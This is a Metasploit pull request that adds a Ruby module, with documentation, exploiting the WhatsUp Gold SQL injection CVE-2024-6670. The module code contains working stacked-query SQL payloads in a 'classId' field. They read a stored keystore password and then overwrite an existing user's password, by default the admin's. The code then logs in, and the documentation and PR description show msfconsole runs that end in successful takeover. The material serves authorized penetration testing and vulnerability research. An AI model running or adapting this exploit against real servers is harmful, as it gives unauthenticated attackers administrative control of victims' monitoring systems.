### PR TITLE
WhatsUp Gold SQL Injection (CVE-2024-6670) Module

### DIFF
--- a/documentation/modules/auxiliary/admin/http/whatsup_gold_sqli.md
+++ b/documentation/modules/auxiliary/admin/http/whatsup_gold_sqli.md
@@ -1,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits a SQL injection vulnerability in WhatsUp Gold < v24.0.0 (CVE-2024-6670), by changing the password of an existing user
+(such as of the default `admin` account) to an attacker-controlled one.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://cdn.ipswitch.com/nm/WhatsUpGold/23.1.3/WhatsUpGold-23.1.3-FullInstall.exe).
+
+Installation instructions are available [here](https://docs.progress.com/bundle/whatsupgold-install-23-1/page/Prior-to-installation.html).
+
+**Successfully tested on**
+
+- WhatsUp Gold v23.1.3 on Windows 22H2
+- WhatsUp Gold v23.1.2 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/http/whatsup_gold_sqli 
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > set RHOSTS <IP>
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > run
+```
+
+This should update the password of the default `admin` account.
+
+## Options
+
+### USERNAME
+The user of which to update the password (default: admin)
+
+### PASSWORD
+The new password for the user
+
+## Scenarios
+
+Running the exploit against WhatsUp Gold v23.1.3 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > run
+[*] Running module against 192.168.217.143
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 23.1.3
+[+] New password for admin was successfully set:
+	admin:SzESLHhWxKyf
+[+] Login at: https://192.168.217.143/NmConsole/#home
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
+++ b/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
       vprint_status('Version retrieved: ' + version)
     end
 
-    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('23.1.3')
+    return Exploit::CheckCode::Appears("Version: #{version}") if Rex::Version.new(version) <= Rex::Version.new('23.1.3')
 
     Exploit::CheckCode::Safe
   end
@@ -129,8 +129,7 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::UnexpectedReply, 'Unexpected server response received.')
     end
 
-    body = res.body.to_s
-    json_body = JSON.parse(body)
+    json_body = res.get_json_document
 
     result = json_body.find { |item| item['DisplayName'].start_with?(marker.to_s) }
     unless result

--- a/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
+++ b/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
 
     data = res.get_json_document
     data_js = data['js']
-    version_path = data_js.find { |item| item["path"] =~ /app-/ }["path"]
+    version_path = data_js.find { |item| item['path'] =~ /app-/ }['path']
     version = version_path[/app-(.*)\.js/, 1]
     if version.nil?
       return CheckCode::Unknown

--- a/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
+++ b/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
@@ -53,9 +53,10 @@ class MetasploitModule < Msf::Auxiliary
 
     return CheckCode::Unknown unless res && res.code == 200
 
-    data = res.body
-    version = data.match(/"path":"app-(.*?)\.js"/)[1]
-
+    data = res.get_json_document
+    data_js = data['js']
+    version_path = data_js.find { |item| item["path"] =~ /app-/ }["path"]
+    version = version_path[/app-(.*)\.js/, 1]
     if version.nil?
       return CheckCode::Unknown
     else
@@ -97,8 +98,7 @@ class MetasploitModule < Msf::Auxiliary
       range: rand(1..9).to_s,
       n: rand(1..9).to_s,
       start: rand(1..9).to_s,
-      end: rand(1..9).to_s,
-      businesdsHoursId: rand(1..9).to_s
+      end: rand(1..9).to_s
     }.to_json
 
     res = send_request_cgi(
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Auxiliary
     json_body = JSON.parse(body)
 
     result = json_body.find { |item| item['DisplayName'].start_with?(marker.to_s) }
-    unless result || result.nil
+    unless result
       fail_with(Failure::UnexpectedReply, 'Coud not find DisplayName match with marker.')
     end
 
@@ -150,8 +150,7 @@ class MetasploitModule < Msf::Auxiliary
       range: rand(1..9).to_s,
       n: rand(1..9).to_s,
       start: rand(1..9).to_s,
-      end: rand(1..9).to_s,
-      businesdsHoursId: rand(1..9).to_s
+      end: rand(1..9).to_s
     }.to_json
 
     res = send_request_cgi(

--- a/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
+++ b/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
@@ -1,0 +1,169 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  # prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WhatsUp Gold SQL Injection (CVE-2024-6670)',
+        'Description' => %q{
+          This module exploits a SQL injection vulnerability in WhatsUp Gold, by changing the password of the admin user
+          to an attacker-controlled one.
+
+          WhatsUp Gold < v24.0 are affected.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)' # Discovery & PoC
+        ],
+        'References' => [
+          ['CVE', '2024-6670'],
+          ['URL', 'https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024'],
+          ['URL', 'https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-24-1185/']
+        ],
+        'DisclosureDate' => '2024-08-29',
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => 'True'
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'Username of which to update the password (default: admin)', 'admin']),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(12)]),
+    ])
+  end
+
+  def run
+    body = {
+      KeyStorePassword: datastore['NEW_PASSWORD'],
+      TrustStorePassword: datastore['NEW_PASSWORD']
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/WugSystemAppSettings/JMXSecurity'),
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 500
+      fail_with(Failure::UnexpectedReply, 'Unexpected server HTTP status code received.')
+    end
+
+    marker = Rex::Text.rand_text_alpha(10)
+    deviceid = Rex::Text.rand_text_numeric(5)
+
+    body = {
+      deviceId: deviceid.to_s,
+      classId: "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='#{marker}'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--",
+      range: '1',
+      n: '1',
+      start: '3',
+      end: '4',
+      businesdsHoursId: '5'
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/Platform/PerformanceMonitorErrors/HasErrors'),
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200 && res.body == 'false'
+      fail_with(Failure::UnexpectedReply, 'Unexpected server response received.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/Platform/Filter/AlertCenterItemsReportThresholds')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected server response received.')
+    end
+
+    body = res.body.to_s
+    json_body = JSON.parse(body)
+
+    result = json_body.find { |item| item['DisplayName'].start_with?(marker.to_s) }
+    unless result || result.nil
+      fail_with(Failure::UnexpectedReply, 'Coud not find DisplayName match with marker.')
+    end
+
+    display_name = result['DisplayName'].to_s
+    display_name_f = display_name.sub(marker.to_s, '')
+    byte_v = display_name_f.split(',')
+    hex_v = byte_v.map { |value| value.to_i.to_s(16).upcase.rjust(2, '0') }
+    enc_pass = '0x' + hex_v.join
+
+    body = {
+      deviceId: deviceid.to_s,
+      classId: "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = #{enc_pass} where sUserName = '#{datastore['USERNAME']}';--",
+      range: '1',
+      n: '1',
+      start: '3',
+      end: '4',
+      businesdsHoursId: '5'
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/Platform/PerformanceMonitorErrors/HasErrors'),
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200 && res.body == 'false'
+      fail_with(Failure::Unreachable, 'Unexpected server response received.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/User/LoginAjax'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['NEW_PASSWORD'],
+        'rememberMe' => 'false'
+      }
+    )
+
+    json = res.get_json_document
+
+    unless res && res.code == 200 && res.get_cookies.include?('ASPXAUTH') && json['authenticated'] == true
+      fail_with(Failure::NotVulnerable, 'Unexpected response received.')
+    end
+
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['NEW_PASSWORD'], proof: json.to_s)
+    print_good("New #{datastore['USERNAME']} password was successfully set:\n\t#{datastore['USERNAME']}:#{datastore['NEW_PASSWORD']}")
+    print_good("Login at: #{full_uri(normalize_uri(target_uri, 'NmConsole/#home'))}")
+  end
+end


### PR DESCRIPTION
This is a new module which exploits a SQL injection vulnerability in WhatsUp Gold < v24.0.0 (CVE-2024-6670).
Successful exploitation allows an unauthenticated remote attacker to change the password of the admin user.

## Verification Steps

1. Download the installer from the [vendor](https://cdn.ipswitch.com/nm/WhatsUpGold/23.1.3/WhatsUpGold-23.1.3-FullInstall.exe) and deploy it.
2. Start `msfconsole`
3. `use auxiliary/admin/http/whatsup_gold_sqli `
4. `set RHOSTS <IP>`
5. `run`

The password of the admin user will get updated to the one specified in `NEW_PASSWORD`.

```
msf6 > use auxiliary/admin/http/whatsup_gold_sqli 
msf6 auxiliary(admin/http/whatsup_gold_sqli) > set RHOSTS 192.168.217.143
RHOSTS => 192.168.217.143
msf6 auxiliary(admin/http/whatsup_gold_sqli) > run 
[*] Running module against 192.168.217.143
[+] New admin password was successfully set:
	admin:LNxJxYdlIwvj
[+] Login at: https://192.168.217.143/NmConsole/#home
[*] Auxiliary module execution completed
```

**Successfully tested on**

- WhatsUp Gold v23.1.3 on Windows 22H2
- WhatsUp Gold v23.1.2 on Windows 22H2